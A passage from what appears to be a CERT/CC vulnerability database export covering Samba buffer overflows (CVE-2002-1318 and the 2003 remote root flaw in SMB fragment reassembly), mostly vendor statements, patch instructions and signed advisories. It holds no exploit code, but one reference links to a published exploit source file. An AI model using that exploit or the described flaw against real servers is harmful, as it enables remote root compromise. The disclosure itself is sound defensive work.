\n<URI:``<ftp://ftp.trustix.net/pub/Trustix/testing/>``> \n` \n \n`Questions? \nCheck out our mailing lists: \n<URI:``<http://www.trustix.net/support/>``> \n` \n \n`Verification: \nThis advisory along with all TSL packages are signed with the TSL sign key. \nThis key is available from: \n<URI:``<http://www.trustix.net/TSL-GPG-KEY>``> \n` \n` The advisory itself is available from the errata pages at \n<URI:``<http://www.trustix.net/errata/trustix-1.5/>``> \nor directly at \n<URI:``<http://www.trustix.net/errata/misc/2002/TSL-2002-0080-samba.asc.txt>``> \n` \n \n`MD5sums of the packages: \n- -------------------------------------------------------------------------- \n96e5c4eedf3d3e638954f3649acd4759 ./1.5/RPMS/samba-2.2.7-2tr.i586.rpm \n1004f7c7d856db6933dd42cb3e1fdbcd ./1.5/RPMS/samba-client-2.2.7-2tr.i586.rpm \n3bfce6f3114c2531e697749a7cb20b60 ./1.5/RPMS/samba-common-2.2.7-2tr.i586.rpm \n8b072b4cd0e60ebd0b1e1ed60e2a178c ./1.5/SRPMS/samba-2.2.7-2tr.src.rpm \n- -------------------------------------------------------------------------- \n` \n \n`Trustix Security Team \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.6 (GNU/Linux) \nComment: For info see ``<http://www.gnupg.org>`` \n` \n`iD8DBQE94iVPwRTcg4BxxS0RAmwUAJ42n4FkKBhe1ivkRovoHxT1Wyp+kQCffF6L \nqiCjChjM8LMHy9lrUUr7I/w= \n=Dg9h \n-----END PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23958321 Feedback>).\n\n### __ __ Apple Computer Inc.\n\nUpdated: February 14, 2003 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nApple: Not vulnerable. Mac OS X and Mac OS X Server do not make use of Samba's length checking for encrypted password change requests. Instead, the Open Directory service is used for this purpose. As an extra precaution, Mac OS X 10.2.4 has incorporated the fix from the Samba team in the event that the vulnerable function is ever invoked.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23958321 Feedback>).\n\nView all 14 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * [http://marc.theaimsgroup.com/?l=bugtraq&amp;m=103801986818076&amp;w=2](<http://marc.theaimsgroup.com/?l=bugtraq&m=103801986818076&w=2>)\n * <http://us1.samba.org/samba/whatsnew/samba-2.2.7.html>\n * <http://packetstormsecurity.nl/0304-exploits/sambal.c>\n * <http://us1.samba.org/samba/docs/man/smbd.8.html>\n * <http://se.samba.org/samba/docs/SambaIntro.html>\n * <http://www.ciac.org/ciac/bulletins/n-023.shtml>\n * <http://www.samba.org/>\n\n### Acknowledgements\n\nThis vulnerability was discovered by Steve Langasek and Eloy Paris.\n\nThis document was written by Ian A Finlay.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2002-1318](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1318>) \n---|--- \n**Severity Metric:****** | 45.56 \n**Date Public:** | 2002-11-20 \n**Date First Published:** | 2002-12-13 \n**Date Last Updated: ** | 2003-05-16 18:19 UTC \n**Document Revision: ** | 23 \n", "modified": "2003-05-16T18:19:00", "published": "2002-12-13T00:00:00", "id": "VU:958321", "href": "https://www.kb.cert.org/vuls/id/958321", "type": "cert", "title": "Samba contains a remotely exploitable stack buffer overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-09T19:52:50", "bulletinFamily": "info", "description": "### Overview \n\nA buffer overflow vulnerability has been discovered in Samba. An updated version has been released.\n\n### Description \n\nA remotely exploitable buffer overflow vulnerability was discoved to affect Samba versions 2.0.x through 2.2.7a. From their [bulletin](<http://www.samba.org/samba/whatsnew/samba-2.2.8.html>): \n\n_The SuSE security audit team, in particular Sebastian Krahmer, has found a flaw in the Samba main smbd code which could allow an external attacker to remotely and anonymously gain Super User (root) privileges on a server running a Samba server._ \n \n_This flaw exists in previous versions of Samba from 2.0.x to 2.2.7a inclusive. This is a serious problem and all sites should either upgrade to Samba 2.2.8 immediately or prohibit access to TCP ports 139 and 445. Advice created by Andrew Tridgell, the leader of the Samba Team, on how to protect an unpatched Samba server is given at the end of this section._ \n \n_The SMB/CIFS protocol implemented by Samba is vulnerable to many attacks, even without specific security holes. The TCP ports 139 and the new port 445 (used by Win2k and the Samba 3.0 alpha code in particular) should never be exposed to untrusted networks._ \n \n--- \n \n### Impact \n\nA remote attacker may be able to execute arbitrary code with the privileges of the Super User, typically root. \n \n--- \n \n### Solution \n\n[Upgrade](<http://www.samba.org/samba/ftp/>) to Samba version 2.2.8. \n \n--- \n \nThe \"Protecting an unpatched Samba server\" section of the Samba bulletin discusses several work arounds for unpatched servers. \n \n--- \n \n### Vendor Information\n\n298233\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Apple Computer Inc.\n\nUpdated: March 25, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n\\-----BEGIN PGP SIGNED MESSAGE-----\n\nHash: SHA1 \n \nAPPLE-SA-2003-03-24 Samba, OpenSSL \n \nSecurity Update 2003-03-24 is now available. It contains fixes for \nrecent vulnerabilities in: \n \n* OpenSSL: Fixes CAN-2003-0147, a timing attack on RSA keys. \n \n* Samba: Fixes CAN-2003-0085 and CAN-2003-0086 which could allow \nunauthorized remote access to the host system. The built-in Windows \nfile sharing in Mac OS X is based on Samba. Windows file sharing is \noff by default in Mac OS X, but it is recommended that all users \ninstall this Security Update. \n \nNote: This update only applies the security fixes to the \ncurrently-shipping 2.2.3 version of Samba on Mac OS X 10.2.4, and the \nSamba version is otherwise unchanged. The presence of the following \nfile indicates that the update has been applied: \n/Library/Receipts/SecurityUpd2003-03-24.pkg \n \n \nAffected systems: Mac OS X 10.2.4 and earlier \nMac OS X Server 10.2.4 and earlier \n \nSystem requirements: Mac OS X 10.2.4 or Mac OS X Server 10.2.4 \n \nCustomers with earlier Mac OS X versions are encouraged to either \nupgrade to Mac OS X 10.2.4, or visit the Samba and OpenSSL web sites \nfor information on the available fixes. \n \nSecurity Update 2003-03-24 may be obtained from: \n \n* Software Update pane in System Preferences \n \n* Apple's Software Downloads web site: \n<http://www.info.apple.com/kbnum/n120199> \n \nTo help verify the integrity of Security Update 2003-03-24 from the \nSoftware Downloads web site: \n \nThe download file is titled: SecurityUpd2003-03-24.dmg \nIts SHA-1 digest is: 0a80081453bca85493fcbaccd6adad222b41809e \n \nInformation will also be posted to the Apple Product Security web site: \n<http://www.apple.com/support/security/security_updates.html> \n \nThis message is signed with Apple's Product Security PGP key, and \ndetails are available at: \n<http://www.apple.com/support/security/security_pgp.html> \n \n\\-----BEGIN PGP SIGNATURE----- \nVersion: PGP 8.0 \n \niQEVAwUBPn+J9yFlYNdE6F9oAQLn5wgAovbpUeGt5l94+F0uo+bbF6Qfb/WVG5Kk \n3sciromi3Jo/UnAGWyloFU/o1DZeyqqBgZiqGucwXC2T6M9mkIlf2qSFchkWcyBm \natau0h0ey1gd7KNrfXszwb41jxal4WqYw/rg2h0Dgf+gKZ+ZKd5DDFTuIbCu9jWO \nvB7+mW3WJ2zopRjXwEwOTkZApq2wH0DEUbK+R3Qg7B0LvLwKnOK6ATHbN7p2Y7zi \nitVYrEcNR5bPDBVu1rzv5TiwoqNrDjBpuuTRvekpK5eugXRCHXhjlZ+XimafvKrj \nRwnD3zM+E+vPeDiEL0/dnY+sQ3zyadZxZO8NyFFtmOQEMj/ANeot/A== \n=065h \n\\-----END PGP SIGNATURE-----\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23298233 Feedback>).\n\n### __ __ Conectiva\n\nUpdated: March 17, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nConectiva Linux does ship samba and is vulnerable to this issue. Updated packages will be made available in a few days and be posted at our updates site, <http://distro.conectiva.com.br/atualizacoes/> for all our suported versions of the distribution.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23298233 Feedback>).\n\n### __ __ Debian\n\nUpdated: March 17, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nUpdated packages that correct this vulnerability are available at\n\n \n<http://www.debian.org/security/2003/dsa-262>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23298233 Feedback>).\n\n### __ __ FreeBSD\n\nUpdated: April 10, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n\\-----BEGIN PGP SIGNED MESSAGE-----\n\nHash: SHA1 \n \n============================================================================= \nFreeBSD-SN-03:01 Security Notice \nThe FreeBSD Project \n \nTopic: security issue in samba ports \nAnnounced: 2003-04-07 \n \nI. Introduction \n \nSeveral ports in the FreeBSD Ports Collection are affected by security \nissues. These are listed below with references and affected versions. \nAll versions given refer to the FreeBSD port/package version numbers. \nThe listed vulnerabilities are not specific to FreeBSD unless \notherwise noted. \n \nThese ports are not installed by default, nor are they ``part of \nFreeBSD'' as such. The FreeBSD Ports Collection contains thousands of \nthird-party applications in a ready-to-install format. FreeBSD makes \nno claim about the security of these third-party applications. See \n&lt;URL:<http://www.freebsd.org/ports/>&gt; for more information about the \nFreeBSD Ports Collection. \n \nII. Ports \n \n+------------------------------------------------------------------------+ \nPort name: net/samba \nAffected: versions &lt; samba-2.2.8_2, samba-2.2.8a \nStatus: Fixed \n \nTwo vulnerabilities recently: \n \n(1) Sebastian Krahmer of the SuSE Security Team identified \nvulnerabilities that could lead to arbitrary code execution as root, \nas well as a race condition that could allow overwriting of system \nfiles. (This vulnerability was previously fixed in Samba 2.2.8.) \n \n(2) Digital Defense, Inc. reports: ``This vulnerability, if exploited \ncorrectly, leads to an anonymous user gaining root access on a Samba \nserving system. All versions of Samba up to and including Samba 2.2.8 \nare vulnerable. Alpha versions of Samba 3.0 and above are *NOT* \nvulnerable.'' \n \n&lt;URL: <http://us1.samba.org/samba/whatsnew/samba-2.2.8.html> &gt; \n&lt;URL: <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0085> &gt; \n&lt;URL: <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0086> &gt; \n&lt;URL: <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0196> &gt; \n&lt;URL: <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0201> &gt; \n+------------------------------------------------------------------------+ \nPort name: net/samba-tng \nAffected: all versions \nStatus: Not fixed \n \nSome or all of the vulnerabilities affecting Samba may also affect \nSamba-TNG. No confirmation or official patches are available at the \ntime of this security notice. \n+------------------------------------------------------------------------+ \n \nIII. Upgrading Ports/Packages \n \nTo upgrade a fixed port/package, perform one of the following: \n \n1) Upgrade your Ports Collection and rebuild and reinstall the port. \nSeveral tools are available in the Ports Collection to make this \neasier. See: \n/usr/ports/devel/portcheckout \n/usr/ports/misc/porteasy \n/usr/ports/sysutils/portupgrade \n \n2) Deinstall the old package and install a new package obtained from \n \n[FreeBSD 4.x, i386] \n<ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/All/> \n \n[FreeBSD 5.x, i386] \n<ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/All/> \n \nPackages are not automatically generated for other architectures at \nthis time. \n \nNote that new, official packages may not be available on all mirrors \nimmediately. In the interim, Security Officer-generated packages (and \ndetached digital signatures) are available for the i386 architecture \nat: \n \n[FreeBSD 4.x, i386] \n<ftp://ftp2.FreeBSD.org/pub/FreeBSD/security-officer/ports/i386/packages-4-stable/samba-2.2.8_2.tgz> \n<ftp://ftp2.FreeBSD.org/pub/FreeBSD/security-officer/ports/i386/packages-4-stable/samba-2.2.8_2.tgz.asc> \n \n[FreeBSD 5.x] \n<ftp://ftp2.FreeBSD.org/pub/FreeBSD/security-officer/ports/i386/packages-5-current/samba-2.2.8_2.tbz> \n<ftp://ftp2.FreeBSD.org/pub/FreeBSD/security-officer/ports/i386/packages-5-current/samba-2.2.8_2.tbz.asc> \n \n \n+------------------------------------------------------------------------+ \nFreeBSD Security Notices are communications from the Security Officer \nintended to inform the user community about potential security issues, \nsuch as bugs in the third-party applications found in the Ports \nCollection, which will not be addressed in a FreeBSD Security \nAdvisory. \n \nFeedback on Security Notices is welcome at &lt;security-team@FreeBSD.org&gt;. \n\\-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.2.1 (FreeBSD) \n \niD8DBQE+kX+vFdaIBMps37IRAtkmAJ4ruhx4WQLeSPSPgfmzrVW4uYvVJACfRxem \n4q3eO8IxTujzRR2QwH4eyK4= \n=/4KW \n\\-----END PGP SIGNATURE-----\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23298233 Feedback>).\n\n### __ __ Gentoo Linux\n\nUpdated: March 17, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n\\- ---------------------------------------------------------------------\n\nGENTOO LINUX SECURITY ANNOUNCEMENT 200303-11 \n\\- --------------------------------------------------------------------- \n \nPACKAGE : samba \nSUMMARY : buffer overrun \nDATE : 2003-03-17 09:22 UTC \nEXPLOIT : remote \nVERSIONS AFFECTED : &lt;2.2.8 \nFIXED VERSION : &gt;=2.2.8 \nCVE : CAN-2003-0085 CAN-2003-0086 \n \n\\- --------------------------------------------------------------------- \n \nFrom advisory: \n \n\"The SuSE security audit team, in particular Sebastian Krahmer \n&lt;krahmer at suse.de&gt;, has found a flaw in the Samba main smbd code which \ncould allow an external attacker to remotely and anonymously gain \nSuper User (root) privileges on a server running a Samba server.\" \n \n\"A buffer overrun condition exists in the SMB/CIFS packet fragment \nre-assembly code in smbd which would allow an attacker to cause smbd \nto overwrite arbitrary areas of memory in its own process address \nspace. This could allow a skilled attacker to inject binary specific \nexploit code into smbd.\" \n \nRead the full advisory at: \n<http://lists.samba.org/pipermail/samba-announce/2003-March/000063.html> \n \nSOLUTION \n \nIt is recommended that all Gentoo Linux users who are running \nnet-fs/samba upgrade to samba-2.2.8 as follows: \n \nemerge sync \nemerge samba \nemerge clean \n \n\\- --------------------------------------------------------------------- \naliz@gentoo.org - GnuPG key is available at <http://cvs.gentoo.org/~aliz> \n\\- --------------------------------------------------------------------- \n \n \n\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23298233 Feedback>).\n\n### __ Hewlett-Packard Company\n\nUpdated: March 19, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX0303-251>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23298233 Feedback>).\n\n### __ __ IBM\n\nUpdated: April 10, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nThe AIX Toolbox for Linux ships with Samba.\n\nSecurity fixes for the issues discussed in CERT Vulnerability Note VU#298233 have been incorporated into Samba 2.2.7-4 and is available for download from: \n\n\n<ftp://ftp.software.ibm.com/aix/freeSoftware/aixtoolbox/RPMS/ppc/samba/samba-2.2.7-4.aix4.3.ppc.rpm> \nThis download also contains fixes for the issues discussed in CERT Vulnerability Note VU#267873. \n \nPlease note these items are shipped \"as is\" and are unwarranted. \n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23298233 Feedback>).\n\n### __ __ MandrakeSoft\n\nUpdated: March 17, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nPlease see <http://www.mandrakesecure.net/en/advisories/advisory.php?name=MDKSA-2003:032>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23298233 Feedback>).\n\n### __ MontaVista Software\n\nUpdated: March 17, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23298233 Feedback>).\n\n### __ __ OpenPKG\n\nUpdated: March 19, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`________________________________________________________________________ \n` \n`OpenPKG Security Advisory The OpenPKG Project \n``<http://www.openpkg.org/security.html>`` ``<http://www.openpkg.org>`` \nopenpkg-security@openpkg.org openpkg@openpkg.org \nOpenPKG-SA-2003.021 18-Mar-2003 \n________________________________________________________________________ \n` \n`Package: samba \nVulnerability: remote root exploit / chown race condition \nOpenPKG Specific: no \n` \n`Affected Releases: Affected Packages: Corrected Packages: \nOpenPKG CURRENT <= samba-2.2.7a-20030207 >= samba-2.2.8-20030316 \nOpenPKG 1.2 <= samba-2.2.7a-1.2.0 >= samba-2.2.7a-1.2.1 \nOpenPKG 1.1 <= samba-2.2.5-1.1.1 >= samba-2.2.5-1.1.2 \n` \n`Dependent Packages: none \n` \n`Description: \nSebastian Krahmer, SuSE Security Team, [0] has alerted the Samba Team \nto two serious vulnerabilities in all versions of Samba [1] up to and \nincluding version 2.2.7a. We have backported the security relevant \npieces of the 2.2.8 vendor changes into releases used by OpenPKG. \n` \n` If exploited correctly, it could lead to an anonymous user gaining \nroot access on a Samba serving system. All versions of Samba up to \nand including Samba 2.2.7a are vulnerable. The Common Vulnerabilities \nand Exposures (CVE) project assigned the id CAN-2003-0085 [2] to the \nproblem. \n` \n` In addition he pointed out a chown(2) race condition which could \nallow overwriting of critical system files if exploited. The \nCommon Vulnerabilities and Exposures (CVE) project assigned the id \nCAN-2003-0086 [3] to the problem. \n` \n` Please check whether you are affected by running \"<prefix>/bin/rpm -q \nsamba\". If you have the \"samba\" package installed and its version is \naffected (see above), we recommend that you immediately upgrade it \n(see Solution). [4][5] \n` \n`Solution: \nSelect the updated source RPM appropriate for your OpenPKG release \n[6][7], fetch it from the OpenPKG FTP service [8][9] or a mirror \nlocation, verify its integrity [10], build a corresponding binary \nRPM from it [4] and update your OpenPKG installation by applying the \nbinary RPM [5]. For the current release OpenPKG 1.2, perform the \nfollowing operations to permanently fix the security problem (for \nother releases adjust accordingly). \n` \n` $ ftp ftp.openpkg.org \nftp> bin \nftp> cd release/1.2/UPD \nftp> get samba-2.2.7a-1.2.1.src.rpm \nftp> bye \n$ <prefix>/bin/rpm -v --checksig samba-2.2.7a-1.2.1.src.rpm \n$ <prefix>/bin/rpm --rebuild samba-2.2.7a-1.2.1.src.rpm \n$ su - \n# <prefix>/bin/rpm -Fvh <prefix>/RPM/PKG/samba-2.2.7a-1.2.1.*.rpm \n________________________________________________________________________ \n` \n`References: \n[0] ``<http://www.suse.de/de/security/>`` \n[1] ``<http://www.samba.org/>`` \n[2] ``<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0085>`` \n[3] ``<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0086>`` \n[4] ``<http://www.openpkg.org/tutorial.html#regular-source>`` \n[5] ``<http://www.openpkg.org/tutorial.html#regular-binary>`` \n[6] ``<ftp://ftp.openpkg.org/release/1.1/UPD/samba-2.2.5-1.1.2.src.rpm>`` \n[7] ``<ftp://ftp.openpkg.org/release/1.2/UPD/samba-2.2.7a-1.2.1.src.rpm>`` \n[8] ``<ftp://ftp.openpkg.org/release/1.1/UPD/>`` \n[9] ``<ftp://ftp.openpkg.org/release/1.2/UPD/>`` \n[10] ``<http://www.openpkg.org/security.html#signature>`` \n________________________________________________________________________ \n` \n`For security reasons, this advisory was digitally signed with \nthe OpenPGP public key \"OpenPKG <openpkg@openpkg.org>\" (ID 63C4CB9F) \nof the OpenPKG project which you can find under the official URL \n``<http://www.openpkg.org/openpkg.pgp>`` or on ``<http://keyserver.pgp.com/>``. To \ncheck the integrity of this advisory, verify its digital signature by \nusing GnuPG (``<http://www.gnupg.org/>``). For instance, pipe this message to \nthe command \"gpg --verify --keyserver keyserver.pgp.com\". \n________________________________________________________________________ \n` \n`-----BEGIN PGP SIGNATURE----- \nComment: OpenPKG <openpkg@openpkg.org> \n` \n`iD8DBQE+dz6GgHWT4GPEy58RAsiNAKC+2Z6xASbe/P3fsqe6MZsCQHlSOQCg4Ds7 \nAQDR5amxuodObmeEmincdpM= \n=hgQX \n-----END PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23298233 Feedback>).\n\n### __ __ Red Hat Inc.\n\nUpdated: March 25, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nRed Hat Linux and Red Hat Enterprise Linux ship with a Samba package vulnerable to these issues. Updated Samba packages are available along with our advisory at the URLs below. Users of the Red Hat Network can update their systems using the 'up2date' tool.\n\nRed Hat Linux:\n\n<http://rhn.redhat.com/errata/RHSA-2003-095.html>Red Hat Enterprise Linux:<http://rhn.redhat.com/errata/RHSA-2003-096.html>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23298233 Feedback>).\n\n### __ __ SGI\n\nUpdated: March 20, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n\\-----BEGIN PGP SIGNED MESSAGE-----\n\n______________________________________________________________________________ \nSGI Security Advisory \n \nTitle : SMB/CIFS Security Vulnerability in Samba \nNumber : 20030302-01-I \nDate : March 19, 2003 \nReference: CVE CAN-2003-0085 \nReference: CVE CAN-2003-0086 \nReference: SGI BUGS 883509 884044 \nFixed in : Samba version 2.2.8 \n \n______________________________________________________________________________ \n \n\\- ----------------------- \n\\- --- Issue Specifics --- \n\\- ----------------------- \n \nIt's been reported that there is a SMB/CIFS packet fragment re-assembly code \nvulnerability in versions of Samba prior to version 2.2.8. A successful \nexploit of this vulnerability could allow an external attacker to remotely \nand anonymously gain root privilege on a system running the Samba server. \n \nSee <http://us1.samba.org/samba/whatsnew/samba-2.2.8.html> \n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0085> \n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0086> \nfor more details. \n \nSGI has investigated the issues and recommends the following steps for \nneutralizing the exposure. It is HIGHLY RECOMMENDED that these measures be \nimplemented on ALL vulnerable SGI systems. \n \nThese issues have been corrected in Samba version 2.2.8. \n \n \n\\- -------------- \n\\- --- Impact --- \n\\- -------------- \n \nSamba is an optional product and is not installed by default on IRIX 6.5 \nsystems. \n \nTo determine the version of IRIX you are running, execute the following \ncommand: \n \n# /bin/uname -R \n \nThat will return a result similar to the following: \n \n# 6.5 6.5.16f \n \nThe first number (\"6.5\") is the release name, the second (\"6.5.16f\" in this \ncase) is the extended release name. The extended release name is the \n\"version\" we refer to throughout this document. \n \nTo see if Samba is installed, execute the following command: \n \n% versions samba_irix \nI = Installed, R = Removed \n \nName Date Description \n \nI samba_irix 07/02/2002 Samba 2.2.4 for IRIX \nI samba_irix.man 07/02/2002 Samba Online Documentation \nI samba_irix.man.doc 07/02/2002 Samba 2.2.4 Documentation \nI samba_irix.man.manpages 07/02/2002 Samba 2.2.4 Man Page \nI samba_irix.man.relnotes 07/02/2002 Samba 2.2.4 Release Notes \nI samba_irix.src 07/02/2002 Samba Source Code \nI samba_irix.src.samba 07/02/2002 Samba 2.2.4 Source Code \nI samba_irix.sw 07/02/2002 Samba Execution Environment \nI samba_irix.sw.base 07/02/2002 Samba 2.2.4 Execution Environment \n \nIf the result is similar to the above and the version shown is less than \n2.2.8, then the system is vulnerable. \n \n \n\\- ---------------------------- \n\\- --- Temporary Workaround --- \n\\- ---------------------------- \n \nThough it is possible to limit exposure by filtering what IPs can talk to \nyour Samba server, there is no effective workaround to fully address these \nproblems. SGI recommends upgrading to Samba version 2.2.8. \n \n \n\\- ---------------- \n\\- --- Solution --- \n\\- ---------------- \n \nSGI has provided an instable version of Samba for this vulnerability. Our \nrecommendation is to upgrade to Samba version 2.2.8. \n \nThe free unsupported Samba 2.2.8 version can be currently downloaded \nfrom the following websites: \n<http://freeware.sgi.com/beta/fw_samba-2.2.8.tardist> \n<http://master.samba.org/samba/ftp/Binary_Packages/IRIX/> \n \nFor customers who have purchased the SGI supported version of Samba \ncalled samba_irix, please contact your SGI Support Representative and \nrequest CD part number 812-0893-010 -- Samba 2.2.8 for IRIX on CD. \n \n \n\\- ------------------------ \n\\- --- Acknowledgments ---- \n\\- ------------------------ \n \nSGI wishes to thank the Sebastian Krahmer, the SuSE security team, the Samba \nGroup and the users of the Internet Community at large for their assistance \nin this matter. \n \n \n\\- ------------- \n\\- --- Links --- \n\\- ------------- \n \nSGI Security Advisories can be found at: \n<http://www.sgi.com/support/security/> and \n<ftp://patches.sgi.com/support/free/security/advisories/> \n \nSGI Security Patches can be found at: \n<http://www.sgi.com/support/security/> and \n<ftp://patches.sgi.com/support/free/security/patches/> \n \nSGI patches for IRIX can be found at the following patch servers: \n<http://support.sgi.com/irix/> and <ftp://patches.sgi.com/> \n \nSGI freeware updates for IRIX can be found at: \n<http://freeware.sgi.com/> \n \nSGI fixes for SGI open sourced code can be found on: \n<http://oss.sgi.com/projects/> \n \nSGI patches and RPMs for Linux can be found at: \n<http://support.sgi.com/linux/> or \n<http://oss.sgi.com/projects/sgilinux-combined/download/security-fixes/> \n \nSGI patches for Windows NT or 2000 can be found at: \n<http://support.sgi.com/nt/> \n \nIRIX 5.2-6.4 Recommended/Required Patch Sets can be found at: \n<http://support.sgi.com/irix/> and <ftp://patches.sgi.com/support/patchset/> \n \nIRIX 6.5 Maintenance Release Streams can be found at: \n<http://support.sgi.com/colls/patches/tools/relstream/index.html> \n \nIRIX 6.5 Software Update CDs can be obtained from: \n<http://support.sgi.com/irix/swupdates/> \n \nThe primary SGI anonymous FTP site for security advisories and patches is \npatches.sgi.com (216.32.174.211). Security advisories and patches are \nlocated under the URL <ftp://patches.sgi.com/support/free/security/> \n \nFor security and patch management reasons, ftp.sgi.com (mirrors \npatches.sgi.com security FTP repository) lags behind and does not do a \nreal-time update. \n \n \n\\- ----------------------------------------- \n\\- --- SGI Security Information/Contacts --- \n\\- ----------------------------------------- \n \nIf there are questions about this document, email can be sent to \nsecurity-info@sgi.com. \n \n\\------oOo------ \n \nSGI provides security information and patches for use by the entire SGI \ncommunity. This information is freely available to any person needing the \ninformation and is available via anonymous FTP and the Web. \n \nThe primary SGI anonymous FTP site for security advisories and patches is \npatches.sgi.com (216.32.174.211). Security advisories and patches are \nlocated under the URL <ftp://patches.sgi.com/support/free/security/> \n \nThe SGI Security Headquarters Web page is accessible at the URL: \n<http://www.sgi.com/support/security/> \n \nFor issues with the patches on the FTP sites, email can be sent to \nsecurity-info@sgi.com. \n \nFor assistance obtaining or working with security patches, please \ncontact your SGI support provider. \n \n\\------oOo------ \n \nSGI provides a free security mailing list service called wiretap and \nencourages interested parties to self-subscribe to receive (via email) all \nSGI Security Advisories when they are released. Subscribing to the mailing \nlist can be done via the Web \n(<http://www.sgi.com/support/security/wiretap.html>) or by sending email to \nSGI as outlined below. \n \n% mail wiretap-request@sgi.com \nsubscribe wiretap &lt;YourEmailAddress such as midwatch@sgi.com &gt; \nend \n^d \n \nIn the example above, &lt;YourEmailAddress&gt; is the email address that you wish \nthe mailing list information sent to. The word end must be on a separate \nline to indicate the end of the body of the message. The control-d (^d) is \nused to indicate to the mail program that you are finished composing the \nmail message. \n \n 